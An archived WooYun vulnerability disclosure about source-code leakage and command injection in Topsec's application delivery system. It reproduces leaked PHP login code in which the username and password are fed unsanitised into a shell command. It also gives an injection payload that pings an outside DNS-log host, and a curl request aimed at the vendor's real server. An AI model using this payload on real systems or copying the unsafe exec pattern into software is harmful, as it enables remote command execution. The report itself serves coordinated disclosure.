乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-02: 细节已通知厂商并且等待厂商处理中 2015-04-09: 厂商已经确认,细节仅向厂商公开 2015-04-19: 细节向核心白帽子及相关领域专家公开 2015-04-29: 细节向普通白帽子公开 2015-05-09: 细节向实习白帽子公开 2015-05-24: 细节向公众公开
天融信应用交付系统源码泄漏天融信1995年成立,总部设在北京。作为中国信息安全行业领导企业,多年来天融信人凭借着高度民族使命感和责任感,秉承“融天下英才、筑可信网络”的人才理念,成功打造出中国信息安全产业领先品牌TOPSEC。
http://mail.topsec.com.cn:8888/login.php. http://mail.topsec.com.cn:8888/login_check.php. http://mail.topsec.com.cn:8888/logout.php. http://mail.topsec.com.cn:8888/redirect.php.
<?phpinclude_once dirname(__FILE__)."/acc/common/uiResources.inc";require_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";require_once dirname(__FILE__)."/acc/common/constant.inc";$error = $_REQUEST['error'];?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD><META http-equiv=Content-Type content="text/html; charset=utf-8"><TITLE><?php echo PRODUCT_NAME_STRING?></TITLE><meta http-equiv="pragram" content="no-cache"><meta http-equiv="expires" content="0"><STYLE type=text/css>BODY { MARGIN: 0px; background-color: #ffffff;}input.SmallButtonStyle{ color: #FFFFFF; background:#017BC4; font:bold 14px Arial; width: 70px; height:30px; border-width :3px; border-style:ridge; border-color:#CCCCCC; vertical-align:middle; text-align:center; cursor: pointer;}.style10 { font-size: 13px; color: #FFFFFF;}</STYLE><LINK href="css/css.css" type=text/css rel=stylesheet><META content="MSHTML 6.00.2900.3314" name=GENERATOR><script language="javascript" src="js/prototype.js"></script><script> function go(){ new Ajax.Request($('loginForm').action, { parameters: "userName=" + $F('userName') + "&password=" + $F('pwd'), onSuccess:function(r){ alert(r.responseText); var d = r.responseText.evalJSON(true); var str = $F('err' + d.code); if(d.code == 0){ if(confirm(d.user + str)){ window.location = 'redirect.php'; }else{ window.location = 'logout.php'; } }else if(d.code == 1){ alert(str); }else{ window.location = 'redirect.php'; } } }); } Event.observe(window, 'load', function(){ $('userName').focus(); <?php if(isset($error)){?> alert($F('err1')); <?php }?> });</script><style type="text/css"><!--.style11 {color: #017BC4}--></style></HEAD><BODY><span class="style11"></span><input type="hidden" id="err0" value="<?php echo LOGIN_INTERRUPT?>"/><input type="hidden" id="err1" value="<?php echo LOGIN_ERROR_STRING?>"/><input type="hidden" id="err2" value=""/><table width="100%" height="90%"> <tr align="center"> <td height="360"> <table width="460" height="275" background="images/login-background.jpg"> <tr> <td width="44" height="90" align="center"> </td> <td width="181" height="90" align="center"></td> <td width="219" vAlign="bottom" align="right"> </td> </tr> <tr> <td height="22" align="center"> </td> <td height="22" align="center"> </td> <TD ><!-- #EndLibraryItem --></TD> </tr> <tr> <td height="38" align="center"> </td> <td height="38" colspan="2" align="center"> <CENTER> <FORM action="login_check.php" id="loginForm" method=post><TABLE border=0> <TBODY> <TR align=middle> <TD width="97" align="right"><strong><?php echo INDEX_USERNAME_STRING ?>:</strong></TD> <TD width="230"><INPUT style="width:200px;" id=userName size=28 name='userName'></TD> </TR> <TR align=middle> <TD align="right"><strong><?php echo INDEX_PASSWORD_STRING ?>:</strong></TD> <TD><INPUT style="width:200px; " id="pwd" type=password size=28 name='password'></TD> </TR> <TR align=middle> <TD height="44" colspan="1"> </TD> <TD align="left"><INPUT type='image' src='<?php echo LOGIN_IMAGE ?>' align="top" value="aaaa" ></INPUT></TD> </TR></TBODY></TABLE></FORM></CENTER></td> </tr> <tr> <td height="27" align="center"> </td> <td height="27" align="center"> </td> <td align="center"> </td> </tr> </table> </td> </tr></table><TABLE cellSpacing=0 cellPadding=0 width=1024 border=0> <TBODY> <TR> <TD align=middle height=46><span class="style10">©</span><FONT color=white><B> <?php echo PAGE_COPYRIGHT_STRING; ?> </B></FONT></TD></TR></TBODY></TABLE></BODY></HTML>
<?php require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc'; session_start(); /* $remoteIp = $_SERVER['REMOTE_ADDR']; file_put_contents("/tmp/loginIp", $remoteIp); $user = $_SESSION['userInfo']; syslog(LOG_INFO, "$user login from $remoteIp"); */ logger('auth', 'User Auth', LOG_ACTION_LOGIN); header("Location:/");?>
<?php require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc'; session_start(); logger('auth', 'User Auth', LOG_ACTION_LOGOUT); $remote = $_SERVER['REMOTE_ADDR'];// . ':' . $_SERVER['REMOTE_PORT']; $line = file_get_contents('/tmp/loginIp'); if($remote == $line) file_put_contents("/tmp/loginIp", ''); $user = $_SESSION['userInfo']; syslog(LOG_INFO, "$user logout from $remoteIp"); $_SESSION = array(); if (isset($_COOKIE[session_name()])) { setcookie(session_name(), '', time()-42000, '/'); } session_destroy(); header("Location:/");?>
<?phprequire_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc'; session_start(); $userManager = new UserManager(); $userName = ""; $password = ""; if(isset($_REQUEST["userName"])){ $userName = $_REQUEST["userName"]; $password = $_REQUEST["password"]; } if($userManager->certificateUser($userName,$password)){ header("location: redirect.php"); }else{ header("location: login.php?error=1"); }?>
太复杂了,看代码不爽,直接黑盒搞个命令执行看看
; ping 333d61.dnslog.info; echo
curl 'http://mail.topsec.com.cn:888login_check.php.'<?phprequire_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc'; session_start(); $userManager = new UserManager(); $userName = ""; $password = ""; if(isset($_REQUEST["userName"])){ $userName = $_REQUEST["userName"]; $password = $_REQUEST["password"]; } if($userManager->certificateUser($userName,$password)){ header("location: redirect.php"); }else{ header("location: login.php?error=1"); }?>
public function certificateUser($user,$pass){ $logined = false; //if(strcasecmp($user,"admin")!=0){ // return false; //} $validateUserPassFormat= APPEX_CMD_LOC.'ckpwd %s %s'; $command = sprintf($validateUserPassFormat,$user,$pass); $result = execute($command); $status = $result->get('retValue'); if($status ==0){ $_SESSION['userInfo']=$user; $userDao = new UserDao(); $user = $userDao->getUserFromUserName($user); $_SESSION['userType']=$user->getUserType(); $logined = true; } return $logined; }
危害等级:高
漏洞Rank:20
确认时间:2015-04-09 18:07
感谢您的漏洞报送,产品问题正在修复中。
暂无